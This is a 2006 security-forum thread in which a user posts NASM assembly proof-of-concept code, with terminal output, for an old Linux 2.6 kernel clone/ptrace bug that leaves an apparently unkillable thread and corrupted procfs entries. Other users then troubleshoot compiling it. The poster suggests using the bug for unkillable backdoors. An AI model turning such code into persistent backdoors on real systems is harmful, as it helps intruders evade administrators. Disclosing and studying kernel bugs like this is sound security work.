Waraxe IT Security Portal
Login or Register
December 3, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 60
Members: 0
Total: 60
Full disclosure
Microsoft Warbird and PMP security research - technical doc
Access Control in Paxton Net2 software
SEC Consult SA-20241127-0 :: Stored Cross-Site Scripting in Omada Identity (CVE-2024-52951)
SEC Consult SA-20241125-0 :: Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element, Siemens CP-2016 & CP-2019
Re: Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Linux world -> NEW! Unkillable thread + procfs corruption Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
NEW! Unkillable thread + procfs corruption
PostPosted: Tue Jan 10, 2006 4:28 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




This is a new PoC of the old bug I found, now it can run the thread!!!
And in the old bug, the thread could be killed re-attaching it, now it can't!!!
And one more thing, some of the ProcFS info is corrupted, so you can't see some things as maps, mem, and tasks.
I'm testing on a 2.6.11, last time on a 2.6.13 the old version worked.
A friend toldme that in 2.6.14 you can kill it Sad
Please try it and post your results!
This bug can be used to code unkillable backdoors, forcing the admin to reboot

Quote:

CLONE_VM equ 0x00000100
CLONE_THREAD equ 0x00010000
CLONE_SIGHAND equ 0x00000800
SIGCHLD equ 17

[extern printf]

[section .data]
forked db " >> fork: %d",10,0

[section .text]
no_child:
push eax
push forked
call printf
xor ebx, ebx
mov eax, 1
call 0xffffe400
bad:
[section .data]
..@4.cadena: db " !! Can't create thread",10
[section .text]
mov ebx, 1
mov ecx, ..@4.cadena
mov edx, 23+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400
main:
mov eax, 2
call 0xffffe400
test eax, eax
jnz no_child
[section .data]
..@13.cadena: db " >> Creating thread...",10
[section .text]
mov ebx, 1
mov ecx, ..@13.cadena
mov edx, 22+1
mov eax, 4
call 0xffffe400
mov ebx, CLONE_VM | CLONE_THREAD | CLONE_SIGHAND | SIGCHLD
xor ecx, ecx
mov eax, 120
call 0xffffe400
test eax, eax
jz child
test eax, 0x80000000
jnz bad
xor ebx, ebx
mov eax, 1
call 0xffffe400
child:
xor ebx, ebx
mov eax, 26
call 0xffffe400
test eax, eax
jnz bad2
[section .data]
..@26.cadena: db " >> Thread attached and running",10
[section .text]
mov ebx, 1
mov ecx, ..@26.cadena
mov edx, 31+1
mov eax, 4
call 0xffffe400
aki: jmp aki
bad2:
[section .data]
..@32.cadena: db " !! Can't attach",10
[section .text]
mov ebx, 1
mov ecx, ..@32.cadena
mov edx, 16+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400


Quote:

erg0t nasm # nasm -felf test.asm ; gcc test.o -o test ; ./test
>> Creating thread...
>> fork: 8407
erg0t nasm # >> Thread attached and running
killall -9 test ; ps -A | grep test
8407 pts/0 00:00:27 test <defunct>
erg0t nasm # ls /proc/8407
auxv cmdline cwd environ exe fd maps mem mounts oom_adj oom_score root stat statm status task
erg0t nasm # cat /proc/8407/*
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inv?lido
0
0
cat: /proc/8407/root: No existe el fichero o el directorio
8407 (test) Z 1 8406 7842 34816 8417 76 1 0 0 0 2764 5 0 0 17 0 2 0 1002050 0 0 4294967295 0 0 0 0 0 256 0 0 0 4294967295 0 0 17 0 0 0
0 0 0 0 0 0 0
Name: test
State: Z (zombie)
SleepAVG: 58%
Tgid: 8407
Pid: 8407
PPid: 1
TracerPid: 0
Uid: 0 0 0 0
Gid: 0 0 0 0
FDSize: 0
Groups: 0 1 2 3 4 6 10 11 20 26 27
Threads: 2
SigPnd: 0000000000000100
ShdPnd: 0000000000000100
SigBlk: 0000000080000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 00000000fffffeff
CapEff: 00000000fffffeff
cat: /proc/8407/task: No existe el fichero o el directorio
erg0t nasm # uname -a
Linux erg0t 2.6.11 #1 Tue Dec 13 19:38:25 GMT 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Jan 10, 2006 5:33 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




well, I did some more tests, and the thread is terminated, but the structures still there, so is really killed Sad
I will try to do some more tests to se if I can find a way to keep the thread running
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 11, 2006 10:41 am Reply with quote
fizzi
Advanced user
Advanced user
Joined: Sep 14, 2005
Posts: 55




hi
i tried to compilie your progg under amd64 but it didn't work. i got kernel 2.6.15 and i get
Quote:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

perhaps u can tell me to get this thing compiled for amd64 or 32bit arch.
View user's profile Send private message
PostPosted: Wed Jan 11, 2006 2:42 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




fizzi wrote:
hi
i tried to compilie your progg under amd64 but it didn't work. i got kernel 2.6.15 and i get
Quote:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

perhaps u can tell me to get this thing compiled for amd64 or 32bit arch.


Is only for x86
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 11, 2006 3:09 pm Reply with quote
fizzi
Advanced user
Advanced user
Joined: Sep 14, 2005
Posts: 55




yeah, but isn't amd64 compatible to 32bit programs?
so, this should also work on my x86_64 architecture, but it just won't compile.
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 1:21 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Hey erg0t hows everything holding up? Ah isnt assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 3:32 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




shai-tan wrote:
Hey erg0t hows everything holding up? Ah isnt assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan


Hi, I have NASM version 0.98.39 compiled on Dec 15 2005 and
gcc versi?n 3.3.6 (Gentoo 3.3.6, ssp-3.3.6-1.0, pie-8.7.Cool

btw I send a patch of another bug in clone and was added to the -mm tree
Is called i386-sys_clone-from-vsyscall.patch
I'm very happy Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Jan 12, 2006 5:21 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Ah maybe its gcc 4.0 which is breaking it.

Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 7:29 pm Reply with quote
fizzi
Advanced user
Advanced user
Joined: Sep 14, 2005
Posts: 55




shai-tan wrote:
Hey erg0t hows everything holding up? Ah isnt assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan


As i can see, this is the same error message i get when i try to compile this thingy. but i got amd64 and gcc 3.4.4
"undefined reference to main" ... seems he cant find the main routine. so ... any other linker or compiler i can choose?
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 7:37 pm Reply with quote
fizzi
Advanced user
Advanced user
Joined: Sep 14, 2005
Posts: 55




Quote:
gcc -nostartfiles -o test test.o
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

Ok, i'm getting closer ...
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 7:47 pm Reply with quote
fizzi
Advanced user
Advanced user
Joined: Sep 14, 2005
Posts: 55




Quote:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

i give up
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 8:07 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




fizzi wrote:
Quote:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

i give up


The problem is that nasm generates code only for x86, maybe you can convert the code to gas.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jan 13, 2006 6:05 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Well I use x86 and why is it not working?

Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Jan 13, 2006 10:02 am Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




shai-tan wrote:
Well I use x86 and why is it not working?

Shai-tan


Sorry, I know what is happening, I use lot of macros I made for my code, so to get a code that everyone could compile I used nasm -e and posted the output, but by mistake I didn't select one line before containing [global main]. So to get the code working you have to add global main to the top of the code.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jan 13, 2006 10:17 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Ah I see.

Thanks. I'll get round to it later cause Im a bit busy tonight. Ill tell you what happens


Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
NEW! Unkillable thread + procfs corruption
www.waraxe.us Forum Index -> Linux world
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds